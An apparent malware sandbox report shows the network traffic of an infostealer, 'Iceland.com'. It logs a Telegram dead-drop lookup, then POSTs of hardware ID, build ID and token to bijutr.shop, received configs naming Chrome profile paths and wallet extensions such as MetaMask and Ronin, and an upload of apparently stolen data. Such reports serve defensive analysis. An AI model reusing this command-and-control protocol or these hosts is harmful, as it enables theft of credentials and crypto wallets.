                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.843633890 CET1.1.1.1192.168.2.40x971No error (0)bijutr.shop188.245.216.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:44.748589039 CET1.1.1.1192.168.2.40x8c84No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:44.749243021 CET1.1.1.1192.168.2.40xcaa9No error (0)www.google.com65IN (0x0001)false

                                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                                              • t.me
                                                                                                                                                                                                                                                              • bijutr.shop
                                                                                                                                                                                                                                                              • www.google.com

                                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.449735149.154.167.994437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:27 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                              Host: t.me
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:09:27 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:27 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              Content-Length: 12298
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: stel_ssid=cd07a4f893f6d3434c_2352031337646591415; expires=Sat, 28 Dec 2024 06:09:27 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Cache-control: no-store
                                                                                                                                                                                                                                                              X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                              2024-12-27 06:09:27 UTC12298INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              1192.168.2.449738188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:29 UTC231OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:09:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:30 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:09:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              2192.168.2.449740188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:32 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----XT0RIWTJM7GV3E3OPZU3
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 255
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:09:32 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 58 54 30 52 49 57 54 4a 4d 37 47 56 33 45 33 4f 50 5a 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 45 33 37 35 44 32 30 45 42 30 46 38 30 37 36 35 36 36 31 35 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 58 54 30 52 49 57 54 4a 4d 37 47 56 33 45 33 4f 50 5a 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 58 54 30 52 49 57 54 4a 4d 37 47 56 33 45 33 4f 50 5a 55 33 2d 2d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: ------XT0RIWTJM7GV3E3OPZU3Content-Disposition: form-data; name="hwid"CE375D20EB0F807656615-a33c7340-61ca------XT0RIWTJM7GV3E3OPZU3Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------XT0RIWTJM7GV3E3OPZU3--
                                                                                                                                                                                                                                                              2024-12-27 06:09:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:32 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:09:32 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 3a1|1|1|1|d6efe9e6f5b734065d29d7e36ae274f3|1|0|1|1|0|50000|00


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              3192.168.2.449742188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:34 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----W4EUAIMGLN7YMYCB1NOP
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:09:34 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 57 34 45 55 41 49 4d 47 4c 4e 37 59 4d 59 43 42 31 4e 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 57 34 45 55 41 49 4d 47 4c 4e 37 59 4d 59 43 42 31 4e 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 57 34 45 55 41 49 4d 47 4c 4e 37 59 4d 59 43 42 31 4e 4f 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------W4EUAIMGLN7YMYCB1NOPContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------W4EUAIMGLN7YMYCB1NOPContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------W4EUAIMGLN7YMYCB1NOPCont
                                                                                                                                                                                                                                                              2024-12-27 06:09:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:35 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:09:35 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                              Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              4192.168.2.449743188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:37 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----479RQ1NOHDJMYMYU3ECB
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:09:37 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 34 37 39 52 51 31 4e 4f 48 44 4a 4d 59 4d 59 55 33 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 34 37 39 52 51 31 4e 4f 48 44 4a 4d 59 4d 59 55 33 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 34 37 39 52 51 31 4e 4f 48 44 4a 4d 59 4d 59 55 33 45 43 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------479RQ1NOHDJMYMYU3ECBContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------479RQ1NOHDJMYMYU3ECBContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------479RQ1NOHDJMYMYU3ECBCont
                                                                                                                                                                                                                                                              2024-12-27 06:09:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:37 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:09:38 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                              Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              5192.168.2.449744188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:39 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----1NG4WBAS0ZUAAIWBIWL6
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 332
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:09:39 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 31 4e 47 34 57 42 41 53 30 5a 55 41 41 49 57 42 49 57 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 31 4e 47 34 57 42 41 53 30 5a 55 41 41 49 57 42 49 57 4c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 31 4e 47 34 57 42 41 53 30 5a 55 41 41 49 57 42 49 57 4c 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------1NG4WBAS0ZUAAIWBIWL6Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------1NG4WBAS0ZUAAIWBIWL6Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------1NG4WBAS0ZUAAIWBIWL6Cont
                                                                                                                                                                                                                                                              2024-12-27 06:09:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:40 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:09:40 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              6192.168.2.449745188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:42 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----ZMYUKN7900ZU37YMY5FK
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 7617
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:09:42 UTC7617OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 5a 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 5a 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------ZMYUKN7900ZU37YMY5FKContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------ZMYUKN7900ZU37YMY5FKContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------ZMYUKN7900ZU37YMY5FKCont
                                                                                                                                                                                                                                                              2024-12-27 06:09:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:43 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:09:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              7192.168.2.449746188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:43 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----ZMYUKN7900ZU37YMY5FK
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 489
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:09:43 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 5a 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 5a 4d 59 55 4b 4e 37 39 30 30 5a 55 33 37 59 4d 59 35 46 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------ZMYUKN7900ZU37YMY5FKContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------ZMYUKN7900ZU37YMY5FKContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------ZMYUKN7900ZU37YMY5FKCont
                                                                                                                                                                                                                                                              2024-12-27 06:09:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:44 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:09:44 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              8192.168.2.449752172.217.21.364433844C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:46 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:47 GMT
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
